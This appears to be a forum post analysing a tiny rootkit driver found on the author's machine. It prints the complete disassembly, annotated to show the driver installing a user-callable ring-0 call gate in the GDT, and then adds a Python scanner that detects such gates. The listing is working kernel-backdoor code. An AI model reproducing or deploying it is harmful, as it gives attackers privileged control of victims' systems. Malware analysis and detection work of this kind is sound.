A few days ago I found a hidden SYS file on my machine; AntiVir flagged it as a RootKit. Taking a look, I found it is very slim, only 640 bytes. Quite tempting, isn't it:
.text:00010200 .686p
.text:00010200 .mmx
.text:00010200 .model flat
.text:00010200
.text:00010200 ; ===========================================================================
.text:00010200
.text:00010200 ; Segment type: Pure code
.text:00010200 ; Segment permissions: Read/Execute
.text:00010200 _text segment para public 'CODE' use32
.text:00010200 assume cs:_text
.text:00010200 ;org 10200h
.text:00010200 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00010200
.text:00010200 ; =============== S U B R O U T I N E =======================================
.text:00010200
.text:00010200 ; Attributes: bp-based frame
.text:00010200
.text:00010200 public start
.text:00010200 start proc near
.text:00010200
.text:00010200 var_2A = qword ptr -2Ah
.text:00010200
.text:00010200 push ebp
.text:00010201 mov ebp, esp
.text:00010203 nop
.text:00010204 nop
.text:00010205 nop
.text:00010206 nop
.text:00010207 pushf
.text:00010208 pusha
.text:00010209 push edx
.text:0001020A sgdt [esp+28h+var_2A] ; GDTR -> [esp-2]: 2-byte limit at esp-2, 4-byte base lands in the slot just pushed
.text:0001020F pop edx ; edx = linear base of the GDT
.text:00010210 mov eax, edx
.text:00010212 mov ecx, 3E0h ; offset of the new entries inside the GDT (selector 3E0h)
.text:00010217 mov byte ptr [edx], 0C3h ; write a RET (C3h) over the first byte of the null descriptor
.text:0001021A mov [ecx+edx], ax ; gate offset bits 15:0 = GDT base
.text:0001021E shr eax, 10h
.text:00010221 mov [ecx+edx+6], ax ; gate offset bits 31:16
.text:00010226 mov dword ptr [ecx+edx+2], 0EC0003E8h ; selector 03E8h; byte 5 = ECh: present, DPL 3, 32-bit call gate
.text:0001022E mov dword ptr [ecx+edx+8], 0FFFFh ; entry at 3E8h: limit 15:0 = FFFFh, base 15:0 = 0
.text:00010236 mov dword ptr [ecx+edx+0Ch], 0CF9A00h ; access 9Ah = present, DPL 0, code; flags CFh = 4 GB, 32-bit
.text:0001023E popa
.text:0001023F popf
.text:00010240 mov eax, 0
.text:00010245 leave
.text:00010246 retn 8
.text:00010246 start endp
.text:00010246
.text:00010246 ; ---------------------------------------------------------------------------
.text:00010249 align 20h
.text:00010249 _text ends
.text:00010249
.text:00010249
.text:00010249 end start
Judging from this code alone, it doesn't seem to have the file-hiding function, so there must be other dirty stuff in there; still looking.
Posting this to keep a record.
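Decoding the constants in the listing: the driver reads the GDT base with SGDT, drops a RET byte on it, and builds two entries at GDT+3E0h, a present DPL-3 32-bit call gate (byte ECh) whose selector 03E8h names a flat ring-0 code segment (access 9Ah, flags CFh), that is, a kernel entry point reachable from user mode. The Python below is an added example, not part of the post or the driver: it decodes GDT entries and flags exactly that pattern, as a rootkit scanner would; the GDT image and its base address are constructed here and are assumptions.

```python
import struct

# Assumed GDT base; the real driver reads it with SGDT. Only used to build the sample.
GDT_BASE = 0x8003F000

def build_sample_gdt(gdt_base=GDT_BASE):
    """Constructed GDT image: 0x400 zero bytes plus the entries the listing writes."""
    gdt = bytearray(0x400)
    gdt[0] = 0xC3                                            # RET byte at the GDT base
    struct.pack_into("<H", gdt, 0x3E0, gdt_base & 0xFFFF)    # gate offset 15:0
    struct.pack_into("<H", gdt, 0x3E6, gdt_base >> 16)       # gate offset 31:16
    struct.pack_into("<I", gdt, 0x3E2, 0xEC0003E8)           # selector 03E8h, byte 5 = ECh
    struct.pack_into("<I", gdt, 0x3E8, 0x0000FFFF)           # target: limit 15:0, base 15:0
    struct.pack_into("<I", gdt, 0x3EC, 0x00CF9A00)           # target: access 9Ah, flags CFh
    return bytes(gdt)

def decode_descriptor(b):
    """Decode one 8-byte GDT entry into a dict (call gates and code/data segments)."""
    access = b[5]
    d = {"present": bool(access & 0x80), "dpl": (access >> 5) & 3, "type": access & 0xF}
    if not (access & 0x10) and d["type"] in (0x4, 0xC):      # S=0, type 4/C: call gate
        d["kind"] = "call_gate"
        d["offset"] = b[0] | (b[1] << 8) | (b[6] << 16) | (b[7] << 24)
        d["selector"] = b[2] | (b[3] << 8)
        return d
    d["kind"] = "code" if (access & 0x18) == 0x18 else ("data" if access & 0x10 else "system")
    d["base"] = b[2] | (b[3] << 8) | (b[4] << 16) | (b[7] << 24)
    limit = b[0] | (b[1] << 8) | ((b[6] & 0x0F) << 16)
    d["limit"] = (limit << 12) | 0xFFF if b[6] & 0x80 else limit   # G bit: 4 KB pages
    return d

def find_user_callable_ring0_gates(gdt):
    """Flag present call gates usable from ring 3 (DPL 3) that land in ring-0 code."""
    findings = []
    for off in range(0, len(gdt) - 7, 8):
        d = decode_descriptor(gdt[off:off + 8])
        if d["kind"] != "call_gate" or not d["present"] or d["dpl"] != 3:
            continue
        tgt_off = d["selector"] & ~7
        if d["selector"] & 4 or tgt_off + 8 > len(gdt):      # LDT selector or out of range
            continue
        tgt = decode_descriptor(gdt[tgt_off:tgt_off + 8])
        if tgt["kind"] == "code" and tgt["present"] and tgt["dpl"] == 0:
            findings.append({"gate_selector": off, "target_selector": d["selector"],
                             "entry": d["offset"], "target_base": tgt["base"],
                             "target_limit": tgt["limit"]})
    return findings

if __name__ == "__main__":
    for f in find_user_callable_ring0_gates(build_sample_gdt()):
        print({k: hex(v) for k, v in f.items()})
```

On a live system the same check runs over a GDT copy taken from a kernel debugger or a memory image; a stock Windows GDT contains no DPL-3 call gates at all, so any hit is worth a look.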